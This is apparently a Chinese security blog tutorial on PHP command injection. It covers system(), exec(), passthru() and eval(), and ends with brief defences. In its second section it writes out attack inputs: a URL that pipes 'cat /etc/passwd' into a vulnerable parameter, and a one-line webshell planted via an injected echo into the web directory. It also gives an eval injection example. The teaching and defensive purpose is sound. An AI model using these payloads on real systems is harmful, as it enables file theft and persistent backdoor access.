owasp top A1 注入 Injection (1)PHP注入

最新推荐文章于 2024-11-08 12:34:34 发布
最新推荐文章于 2024-11-08 12:34:34 发布
阅读量235 收藏
点赞数
分类专栏: 安全 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ID33Dhy/article/details/119982536
版权
本文详细讲解了PHP中的命令注入漏洞,涉及system(), exec(), passthru()和eval()函数的使用。介绍了如何利用命令注入获取文件内容和创建木马,同时提供了防御措施,如白名单过滤和参数验证。
摘要由CSDN通过智能技术生成

owasp top A1 注入 Injection (1)PHP注入.1

命令注入漏洞,和SQL注入一样通过改变语句结构执行恶意命令。

1.PHP常见命令执行函数

1.1system()

执行外部程序,并且显示输出,常规用法:
<?php
$whoami = system('whoami', $retval);              //system函数执行whoami查询,返回给$retval参数
echo $retval;  													//外部命令执行后的返回状态,输出$retval
?>

1.2exec()

原型:string exec (string command [, string array [, int return_var]])
exec ()函数与system()类似,也执行给定的命令,但不输出结果,而是返回结果的最后一行。虽然它只返回命令结果的最后一行,但用第二个参数array 可以得到完整的结果,方法是把结果逐行追加到array的结尾处。

1.3passthru()

与system都一样

1.4eval()

eval函数将输入的字符串参数当作PHP程序代码来执行
函数原型:

mixed eval(string code_str) //eval注入一般发生在攻击者能控制输入的字符串的时候

当我们提交http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了;

2.PHP命令注入漏洞

http://www.sectop.com/ex1.php?dir=| cat /etc/passwd

在.php文件后面拼接查询操作,系统执行了就会返回文件内容
一句话木马:

www.baidu.com & echo '<?php eval($_POST[pass]);>' > web目录/sh2ll.php

3.PHP命令注入防御

1、采用白名单,或使用正则表达式进行过滤。

2、不要让用户可以直接控制eval()、system、exec、shell_exec等函数的参数。

3、在进入执行命令函数和方法前,对变量进行过滤,对敏感字符进行转义。

A1 代码审计之 SQL 注入
发哥微课堂
04-09 526
0x00:SQL 注入危害 SQL 注入不像以前那么多了,但是依然存在,原因一句话总结就是没有对用户输入进行防护,造成 SQL 解析器不能区分代码和数据。而其危害如下: 1,敏感信息泄露,例如拖库等操作。2,数据完整性问题,SQL 注入可以对数据库进行恶意的修改、增加和删除。3,权限提升,SQL 注入问题同样可以造成提权的问题。4,获取后台的访问权限,利用 SQLMAP 甚至可以上传文件 get...
2017 owasp top 10
zhaji001
10-25 1014
参考  http://www.owasp.org.cn/owasp-project/2017-owasp-top-10/ 靶机全家桶 https://sourceforge.net/projects/owaspbwa/  A1-注入 注入非常常见例如:SQL,LDAP,XPath,OS命令,XML,SMTP,ORM等等.通过代码审计,扫描工具,手工测试等,可很快发现漏洞. 产生这种漏洞的原...
owasp top A1 注入 Injection (1)SQL注入.1
ID33Dhy的博客
08-29 390
owasp top(1)A1 注入 Injection 注入分为很多种,最常见的是SQL注入,但是通过注入最终达到的结果都是一样的,就是获取敏感信息,植入木马后门,等等。 首先SQL注入,通俗的理解,SQL注入是基于sqlserver,想象一下这样一个场景,当你登录一个网站的时候会需要你输入你自己的账号密码进行登录,而你在输入账号密码的时候,你的账号密码对应的都是一个参数,这些参数需要被传递给服务器进行查询操作比对,既然存在交互操作就有可能出现问题,比如说一些网站建设完之后没有对用户输入的内容进行过滤,导致
A1-注入
blrk
08-12 1180
1、注入     包括SQL、LDAP、Xpath、NoSQL查询语句;OS命令;XML解析器、SMTP头、程序参数等。 2、原因     直接拼接用于提交的参数到查询语句或命令中。 3、危害     数据被窃取、数据篡改、DOS、脱裤等。 4、发现     是否将有害数据和命令、查询分离。     通过源码检查来发现问题,通过渗透测试来验证漏洞。     不合理的错
10大最重要的Web安全风险之一:A1--注入
weixin_33936401的博客
06-26 349
2019独角兽企业重金招聘Python工程师标准>>> ...
OWASP-2017-A1注入
silencediors的博客
01-31 496
SQL注入 SQL注入分类 渗透技术角度分类:盲注、时间盲注、显错注入、联查注入、堆查询注入。 数据提交分类:POST、GET、COOKIE 数据类型分类:字符型、整形 ...
DVWA靶场,集成了owasp top 10漏洞
03-28
1. A1注入攻击(Injection) - 这种攻击发生在用户输入的数据被解释为命令或查询的一部分时。例如SQL注入、命令注入等。在DVWA中,你可以通过尝试构造恶意输入来学习如何利用这种漏洞。 2. A2:身份验证和会话...
modsecurity设置规则防止SQL注入
技术转管理历程
03-16 5130
防止SQL注入 1)cd /etc/httpd/modsecurity-crs/rules 2)vi REQUEST-SELF-101-HASH.conf 写入 # # -=[ SQL Injection Character Anomaly Usage ]=- # # This is a paranoid sibling to 2.2.x Rule 981173. # The re
开源OWASP CRS规则
ducc20180301的博客
11-09 715
一、OWASP介绍 OWASP被视为Web应用安全领域的权威参考,在2009年发布的美国国家和国际立法、标准、准则、委员会和行业实务守则参考引用了OWASP。美国联邦贸易委员会(FTC)强烈建议所有企业需遵循OWASP十大WEB弱点防护守则。国际信用卡数据安全技术PCI标准更将其列为必要组件。OWASP组织为英国GovCERTUK提供SQL注入参考和为欧洲网络与信息安全局(ENISA), 云计算风险评估参考。OWASP TOP 10为IBM APPSCAN、HP WEBINSPECT等扫描器漏洞参考的主要
【模板引擎安全攻略】:全面防御模板注入攻击的有效方法
# 1. 模板注入攻击的原理与危害 ## 1.1 模板注入攻击的定义 模板注入攻击是一种代码注入技术,攻击者在Web应用的模板引擎中注入恶意代码片段,导致不安全的执行或数据泄露。这种攻击方式利用了模板引擎的动态特性...
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
命令执行漏洞
weixin_43749601的博客
03-27 501
简介 命令注入通常是指Web应用在服务器上拼接系统命令而造成的漏洞。 在Web应用中,有时候会用到一些命令执行的函数 PHP system:执行外部程序,并且显示输出 <?php $whoami = system('whoami', $retval); echo $retval; //外部命令执行后的返回状态 ?> #将输出的内容写入变量$retval中,并输出该变量 exec:执行一个外部程序 <?php echo exec('whoami'); ?> exec 执行
命令注入与dvwa中的Command Injection
无痕的博客
01-17 1128
命令注入
OWASP top10(OWASP十大应用安全风险)之A1 注入Injection
qq_39682037的博客
03-15 2446
OWASP TOP10 简介 OWASP(开放式Web应用程序安全项目)的工具、文档、论坛和全球各地分会都是开放的,对所有致力于改进应用程序安全的人士开放,其最具权威的就是“10项最严重的Web 应用程序安全风险列表” ,总结了Web应用程序最可能、最常见、最危险的十大漏洞,是开发、测试、服务、咨询人员应知应会的知识。 top1 注入Injection 当攻击者将无效数据发送到Web应用程序以...
python3---项目bwapp--对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现
xwbk12的博客
05-18 1179
python3—项目bwapp–对2017年的OWASP TOP 10中A1 injection sql 注入(get/search)进行Python3脚本实现 1、项目背景
DVWA学习之Command Injection(命令注入)
weixin_40950781的博客
08-17 736
DVWA学习之Command InjectionCommand Injection(命令注入)0x01何为命令注入?0x02 命令注入漏洞产生的原因0x03dvwa乱码问题0x04 Low级别0x05 medium级别0x06 high级别0x07 impossible级别 Command Injection(命令注入) 0x01何为命令注入? Command Injeciont 即命令注入,是指...
[vulnhub] DarkHole: 1
最新发布
weixin_46099552的博客
11-08 616
vulnhub - DarkHole: 1
PHP-FPM 性能配置优化
陈万洲的专栏
11-05 869
FastCGI 是的简称,是一种交互程序(此处是 PHP)与 Web 服务器之间的 通信协议。FastCGI 是早期通用网关接口(CGI)的增强版本。注意 FastCGI 和 CGI 都是一种通信协议,独立于任何语言。Web 服务器无须对语言有任何了解。除 PHPphp-fpm 外,像 Python, Ruby, Perl, Tcl, C/C++, 和 Visual Basic 都有其各自的 CGI 和 FastCGI 实现。
PHP+MySQL注入攻防实战指南
"PHP+Mysql注入攻防实战.pdf - 一本关于PHP与MySQL数据库的SQL注入攻防教程,适合新手学习。" 在网络安全领域,PHP和MySQL的SQL注入攻击是一个严重的问题,它允许攻击者通过在输入数据中嵌入恶意SQL代码来操纵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值